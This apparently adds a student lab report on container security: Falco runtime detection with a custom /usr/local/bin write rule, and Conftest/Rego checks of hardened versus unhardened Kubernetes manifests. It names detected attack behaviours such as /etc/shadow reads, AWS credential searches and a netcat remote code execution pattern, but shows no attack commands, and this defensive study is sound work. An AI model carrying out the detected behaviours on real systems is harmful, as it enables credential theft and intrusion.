@@ -0,0 +1,222 @@
+# Lab 9 — Monitoring & Compliance: Falco Runtime Detection + Conftest Policies
+
+## Environment
+
+- OS: Windows + PowerShell
+- Docker: Docker Desktop with Linux containers / WSL2 backend
+- Runtime detection tool: Falco 0.43.1
+- Falco engine: modern BPF probe
+- Policy-as-code tool: Conftest with OPA/Rego
+- Runtime test container: alpine:3.19
+- Branch: feature/lab9
+
+## Task 1 — Falco Runtime Security Detection
+
+### Falco setup
+
+I started a helper container based on Alpine:
+
+    docker run -d --name lab9-helper alpine:3.19 sleep 1d
+
+Then I ran Falco in a privileged container with Docker socket and host system mounts. Falco loaded the default rules and my custom rule file from:
+
+    labs/lab9/falco/rules/custom-rules.yaml
+
+Falco logs show that the custom rules file was loaded successfully:
+
+    /etc/falco/rules.d/custom-rules.yaml | schema validation: ok
+
+Evidence files:
+
+- labs/lab9/falco/logs/falco.log
+- labs/lab9/analysis/falco-alerts-summary.txt
+- labs/lab9/falco/rules/custom-rules.yaml
+
+### Baseline alert: terminal shell in container
+
+I triggered a shell event inside the helper container:
+
+    docker exec -it lab9-helper /bin/sh -lc "echo hello-from-shell"
+
+Falco detected this as:
+
+    Terminal shell in container
+
+This alert matters because an interactive shell inside a container can indicate manual debugging, lateral movement, or post-exploitation activity. In a production environment, unexpected shell execution inside a container should be investigated.
+
+Evidence:
+
+    rule="Terminal shell in container"
+    container_name=lab9-helper
+    process=sh
+    command=sh -lc echo hello-from-shell
+    priority=Notice
+
+### Custom Falco rule
+
+I created a custom rule named:
+
+    Write Binary Under UsrLocalBin
+
+Rule file:
+
+    labs/lab9/falco/rules/custom-rules.yaml
+
+The purpose of this rule is to detect write operations under /usr/local/bin inside a container. This is useful because writing new files into binary directories can indicate container drift, unauthorized tool installation, or persistence attempts.
+
+Custom rule logic:
+
+    evt.type in (open, openat, openat2, creat)
+    evt.is_open_write=true
+    fd.name startswith /usr/local/bin/
+    container.id != host
+
+### Custom rule validation
+
+I triggered file writes inside the container:
+
+    docker exec --user 0 lab9-helper /bin/sh -lc "echo boom > /usr/local/bin/drift.txt"
+    docker exec --user 0 lab9-helper /bin/sh -lc "echo custom-test > /usr/local/bin/custom-rule.txt"
+
+Falco detected both writes using my custom rule:
+
+    Falco Custom: File write in /usr/local/bin
+
+Evidence:
+
+    rule="Write Binary Under UsrLocalBin"
+    file=/usr/local/bin/drift.txt
+    container_name=lab9-helper
+    user=root
+    priority=Warning
+
+    rule="Write Binary Under UsrLocalBin"
+    file=/usr/local/bin/custom-rule.txt
+    container_name=lab9-helper
+    user=root
+    priority=Warning
+
+### Tuning notes
+
+This custom rule should fire when a process inside a container writes to /usr/local/bin. It is useful for detecting container drift and unexpected binary placement.
+
+It should not fire for normal application writes outside binary directories, such as writes to /tmp, /var/log, or application data directories. In a production environment, this rule may need allowlists for trusted image build processes, package managers, init scripts, or containers that legitimately manage binaries at runtime.
+
+### Falco event generator
+
+I also ran the Falco event generator:
+
+    docker run --rm --name eventgen --privileged -v /proc:/host/proc:ro -v /dev:/host/dev falcosecurity/event-generator:latest run syscall
+
+Falco captured additional runtime security events, including:
+
+- Disallowed SSH connection on a non-standard port
+- Sensitive file read from /etc/shadow
+- AWS credentials search activity
+- Symlink and hardlink creation over sensitive files
+- Fileless execution via memfd_create
+- Execution from /dev/shm
+- Netcat remote code execution pattern
+- Log tampering activity
+- PTRACE activity
+
+These alerts show that Falco is able to detect suspicious runtime behavior from containers using syscall-level monitoring.
+
+## Task 2 — Policy-as-Code with Conftest
+
+### Reviewed files
+
+Kubernetes manifests:
+
+- labs/lab9/manifests/k8s/juice-unhardened.yaml
+- labs/lab9/manifests/k8s/juice-hardened.yaml
+
+Docker Compose manifest:
+
+- labs/lab9/manifests/compose/juice-compose.yml
+
+Rego policies:
+
+- labs/lab9/policies/k8s-security.rego
+- labs/lab9/policies/compose-security.rego
+
+Evidence files:
+
+- labs/lab9/analysis/conftest-unhardened.txt
+- labs/lab9/analysis/conftest-hardened.txt
+- labs/lab9/analysis/conftest-compose.txt
+
+### Unhardened Kubernetes manifest result
+
+The unhardened Kubernetes manifest failed Conftest checks:
+
+    30 tests, 20 passed, 2 warnings, 8 failures, 0 exceptions
+
+Policy warnings:
+
+    container "juice" should define livenessProbe
+    container "juice" should define readinessProbe
+
+Policy failures:
+
+    container "juice" missing resources.limits.cpu
+    container "juice" missing resources.limits.memory
+    container "juice" missing resources.requests.cpu
+    container "juice" missing resources.requests.memory
+    container "juice" must set allowPrivilegeEscalation: false
+    container "juice" must set readOnlyRootFilesystem: true
+    container "juice" must set runAsNonRoot: true
+    container "juice" uses disallowed :latest tag
+
+### Security analysis of the violations
+
+Missing resource requests and limits are dangerous because a container can consume too much CPU or memory and affect other workloads on the same node. Resource limits support availability and isolation.
+
+Missing allowPrivilegeEscalation: false is dangerous because a process may be able to gain more privileges than intended. Disabling privilege escalation is a standard hardening control.
+
+Missing readOnlyRootFilesystem: true allows the container to write to its root filesystem. This increases the risk of persistence, tampering, and runtime drift.
+
+Missing runAsNonRoot: true allows the container to run as root. Running as root increases the impact of a container escape or application compromise.
+
+Using the :latest tag is unsafe because it is mutable. The deployed image may change without a manifest change, making deployments less reproducible and harder to audit.
+
+Missing liveness and readiness probes reduce operational reliability. Kubernetes cannot accurately detect unhealthy containers or control when a pod is ready to receive traffic.
+
+### Hardened Kubernetes manifest result
+
+The hardened Kubernetes manifest passed all policy checks:
+
+    30 tests, 30 passed, 0 warnings, 0 failures, 0 exceptions
+
+This means the hardened manifest satisfies the policy requirements enforced by the Rego rules.
+
+The hardening changes include:
+
+- fixed image tag instead of :latest
+- CPU and memory requests
+- CPU and memory limits
+- allowPrivilegeEscalation: false
+- readOnlyRootFilesystem: true
+- runAsNonRoot: true
+- liveness probe
+- readiness probe
+
+These settings improve security, reproducibility, and reliability.
+
+### Docker Compose manifest result
+
+The Docker Compose manifest passed all policy checks:
+
+    15 tests, 15 passed, 0 warnings, 0 failures, 0 exceptions
+
+This means the Compose manifest satisfies the provided Docker Compose security policy. The policy checks help ensure that container configuration follows hardening expectations such as avoiding privileged execution and insecure runtime patterns.
+
+## Conclusion
+
+This lab demonstrated two important DevSecOps practices.
+
+First, Falco was used for runtime detection. It detected an interactive shell in a container, writes into /usr/local/bin, and multiple suspicious behaviors generated by the Falco event generator.
+
+Second, Conftest was used for policy-as-code. The unhardened Kubernetes manifest failed because it lacked several security controls, while the hardened manifest and Docker Compose manifest passed the policy checks.
+
+Together, these tools show how runtime monitoring and preventive compliance checks can be combined to improve container and deployment security.